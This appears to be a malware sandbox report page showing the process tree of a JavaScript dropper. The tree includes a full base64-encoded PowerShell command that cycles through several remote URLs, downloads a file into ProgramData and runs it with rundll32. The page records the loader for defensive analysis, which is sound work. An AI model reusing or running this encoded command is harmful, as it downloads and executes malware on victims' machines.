popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\envenomation.js

    3036

    • wscript.exe "C:\Windows\System32\wscript.exe" "C:\ProgramData\Heteromorphic.js" blateroonPursership WhoosisInterall scatbacksNanoinstruction

      1604

      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABFAGwAdQBhAHQAZQBkAEEAcABsAGUAYwB0AHIAdQBtACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBsAEEASABFAEEAZABRAEIAcABBAEgATQBBAGEAUQBCAG4AQQBHADQAQQBZAFEAQgBzAEEAQwA0AEEAWgBRAEIAdQBBAEcAYwBBAGEAUQBCAHUAQQBHAFUAQQBaAFEAQgB5AEEAQQA9AD0AIgA7ACQAUwBjAGEAcgBjAGUAbgBlAHMAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcATQBBAGUAUQBCAGgAQQBHADQAQQBiAHcAQgB3AEEASABNAEEAYQBRAEIAaABBAEYAQQBBAGMAZwBCAGgAQQBHAFUAQQBjAHcAQgBwAEEARwBRAEEAYQBRAEIAaABBAEMANABBAFoAQQBCAHAAQQBIAEkAQQBaAFEAQgBqAEEASABRAEEAYgB3AEIAeQBBAEgAawBBAFIAcwBwAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcATQBBAGIAdwBCAHQAQQBHADAAQQBZAFEAQgB1AEEARwBRAEEAYwBnAEIAcABBAEcAVQBBAEwAZwBCADAAQQBHAGcAQQBaAFEAQgBoAEEASABRAEEAWgBRAEIAeQBBAEEAPQA9AFIAcwBwAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIARABBAEcAVQBBAGMAZwBCAGgAQQBIAFUAQQBiAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFUAQQBCAGgAQQBIAEkAQQBkAEEAQgBwAEEARwBVAEEAYwB3AEEAdQBBAEcATQBBAFoAUQBCAHUAQQBIAFEAQQBaAFEAQgB5AEEAQQA9AD0AUgBzAHAAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABnAEEATgBnAEEAdQBBAEQARQBBAE4AQQBBADMAQQBDADQAQQBOAFEAQQAwAEEAQwA0AEEATgBBAEEANABBAEEAPQA9ACIAOwAkAFIAZQBtAGkAZwByAGEAdABpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AQQBBAHUAQQBEAEkAQQBNAEEAQQB3AEEAQwA0AEEATQBnAEEAMABBAEQAQQBBAEwAZwBBAHgAQQBEAFEAQQBOAEEAQQB2AEEASABvAEEAYgB3AEIAMABBAEQAZwBBAE0AZwBBAHYAQQBFAFEAQQBVAEEAQgBGAEEARwBjAEEAWQBnAEEAPQBUAHAAZQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE0AUQBBAHUAQQBEAEUAQQBPAFEAQQB4AEEAQwA0AEEATQBnAEEAeABBAEQAVQBBAEwAZwBBAHkAQQBEAFEAQQBOAGcAQQB2AEEASABRAEEATAB3AEIAVQBBAEYAWQBBAGMAdwBCAEIAQQBBAD0APQBUAHAAZQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE4AZwBBAHgAQQBDADgAQQBPAFEAQgBoAEEARABZAEEATgB3AEIAdwBBAEcAVQBBAGMAdwBBAHYAQQBFAGMAQQBXAGcAQQAwAEEARgBJAEEAUwBRAEIARwBBAEYAbwBBAFEAZwBCAHUAQQBBAD0APQBUAHAAZQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAMQBBAEQAawBBAEwAZwBBADUAQQBEAGcAQQBMAHcAQgBRAEEASABBAEEAVgBRAEIAWgBBAEYAZwBBAEwAdwBCAHYAQQBEAFEAQQBlAEEAQgBJAEEARwA4AEEAYwBRAEIAcwBBAEcAMABBAFcAQQBCAFYAQQBHAGsAQQBUAHAAZQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE0AUQBBAHcAQQBEAFEAQQBMAHcAQgBVAEEARQB3AEEAUgB3AEIAbwBBAEUANABBAFoAQQBBAHYAQQBFAE0AQQBNAGcAQgBwAEEARwBJAEEAYQBRAEIAUwBBAEgATQBBAFEAdwBCAHkAQQBFADgAQQBXAEEAQQA9ACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFQAcgBpAG0AbwBsAGUAYwB1AGwAYQByAEMAZQByAGEAdABvAGQAaQBkAGEAZQAgAGkAbgAgACQAUgBlAG0AaQBnAHIAYQB0AGkAbgBnACAALQBzAHAAbABpAHQAIAAiAFQAcABlAE4AIgApACAAewB0AHIAeQAgAHsAJABEAGUAbABpAHEAdQBpAHUAbQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIATgBBAEcAVQBBAGIAQQBCAHAAQQBIAEEAQQBiAHcAQgB1AEEARwBrAEEAYgBnAEIAaABBAEcAVQBBAFMAQQBCAHAAQQBHAHcAQQBiAEEAQgB2AEEARwBFAEEAWgBRAEIAawBBAEMANABBAFoAQQBCAHIAQQBBAD0APQBrAGIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBFAEEAZABRAEIAcABBAEgAWQBBAFoAUQBCAHkAQQBHAFUAQQBaAEEAQgBFAEEARwBrAEEAYwB3AEIAMABBAEcAVQBBAGIAZwBCAGsAQQBHAFUAQQBaAEEAQgBzAEEASABrAEEATABnAEIAbQBBAEcAOABBAGMAZwBCAHoAQQBHAEUAQQBiAEEAQgBsAEEAQQA9AD0AIgA7ACQAUABvAHIAbwBwAG8AcgBvACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBuAEEARwBFAEEAYgBBAEIAbABBAEgATQBBAFkAUQBCADEAQQBIAEkAQQBkAFEAQgB6AEEARgBBAEEAYwBnAEIAdgBBAEcATQBBAFoAUQBCAHkAQQBHAGsAQQBkAEEAQgBwAEEARwBNAEEATABnAEIAaQBBAEcARQBBAGMAZwBCAG4AQQBHAEUAQQBhAFEAQgB1AEEASABNAEEAIgA7ACQAcABvAGwAZQBzAHQAYQByAFAAbwBuAHQAaQBmAGkAYwBlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVAByAGkAbQBvAGwAZQBjAHUAbABhAHIAQwBlAHIAYQB0AG8AZABpAGQAYQBlACkAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgACQAcABvAGwAZQBzAHQAYQByAFAAbwBuAHQAaQBmAGkAYwBlAHMAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAVQBuAGQAZQByAHUAdABpAGwAaQB6AGUALgBHAG8AdgBlAHIAbgBpAG4AZwA7ACQAUwB0AHUAbgBuAGUAcgBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBsAEEASABNAEEAWQB3AEIAeQBBAEcAawBBAFkAZwBCAGgAQQBHADQAQQBiAHcAQgBWAEEARwA0AEEAYwB3AEIAaABBAEcATQBBAGMAZwBCAGwAQQBHAFEAQQBMAGcAQgB5AEEARwBFAEEAWQB3AEIAcABBAEcANABBAFoAdwBBAD0AIgA7ACQAYwBvAHIAawBpAHIAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADgAQQBjAEEAQgB3AEEARwA4AEEAYwB3AEIAcABBAEgAUQBBAGEAUQBCAHcAQQBHADgAQQBiAEEAQgBoAEEASABJAEEAUQB3AEIANQBBAEgAUQBBAGIAdwBCAHQAQQBHAGsAQQBZAHcAQgB5AEEARwA4AEEAYwB3AEIAdgBBAEcAMABBAFoAUQBBAHUAQQBHAE0AQQBiAHcAQgB2AEEARwBzAEEAYQBRAEIAdQBBAEcAYwBBAFcAUwA9AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAGEAQQBCAHYAQQBIAFEAQQBiAHcAQgAwAEEARwBVAEEAYgBBAEIAbABBAEgATQBBAFkAdwBCAHYAQQBIAEEAQQBhAFEAQgBqAEEARgBVAEEAYgBnAEIAaABBAEgAQQBBAGMAQQBCAHMAQQBHAEUAQQBkAFEAQgBrAEEARwBVAEEAWgBBAEEAdQBBAEcATQBBAFkAUQBCAHoAQQBHAEUAQQBXAFMAPQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFYAQQBHADQAQQBaAEEAQgBsAEEASABJAEEAWgBRAEIANQBBAEcAawBBAGIAZwBCAG4AQQBDADQAQQBhAHcAQgBwAEEASABRAEEAWQB3AEIAbwBBAEcAVQBBAGIAZwBBAD0AIgA7ACQAYgBhAHIAZwBoAGUAcwB0AHMAUwBhAHAAcgBvAGIAaQBjAGEAbABsAHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAFEAQQBOAFEAQQB1AEEARABJAEEATgBBAEEAMgBBAEMANABBAE4AZwBBADUAQQBDADQAQQBNAFEAQQB6AEEARABVAEEAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAVQBuAGQAZQByAHUAdABpAGwAaQB6AGUALgBHAG8AdgBlAHIAbgBpAG4AZwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIANQAyADkAOAA0ACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEASgBBAEIAbABBAEcANABBAGQAZwBBADYAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFIAQQBCAGgAQQBIAFEAQQBZAFEAQgBjAEEARgBVAEEAYgBnAEIAawBBAEcAVQBBAGMAZwBCADEAQQBIAFEAQQBhAFEAQgBzAEEARwBrAEEAZQBnAEIAbABBAEMANABBAFIAdwBCAHYAQQBIAFkAQQBaAFEAQgB5AEEARwA0AEEAYQBRAEIAdQBBAEcAYwBBAEwAQQBCAGkAQQBHAGsAQQBiAGcAQgBrAEEARABzAEEAIgA7ACQAYgBpAGEAbgBuAHUAYQBsAGwAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAbwBBAEcARQBBAGIAQQBCAHMAQQBHAEUAQQBhAEEAQQB1AEEARwBNAEEAYgB3AEIAdABBAEgAQQBBAGQAUQBCADAAQQBHAFUAQQBjAGcAQQA9AGQAWQBIAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAGMAZwBCAHYAQQBHAFUAQQBiAGcAQgBzAEEARwBFAEEAYwBnAEIAbgBBAEcAVQBBAGIAUQBCAGwAQQBHADQAQQBkAEEAQgBQAEEARwBNAEEAZABBAEIAdgBBAEcAUQBBAFkAUQBCAGoAQQBIAFEAQQBlAFEAQgBzAEEARwA4AEEAZABRAEIAegBBAEMANABBAFoAdwBCAGgAQQBHAHcAQQBiAEEAQgBsAEEASABJAEEAZQBRAEEAPQBkAFkASABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEkAQQBOAGcAQQB1AEEARABFAEEATgBnAEEANQBBAEMANABBAE4AdwBBADIAQQBDADQAQQBOAFEAQQAxAEEAQQA9AD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANAA7AH0AfQA="

        568

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf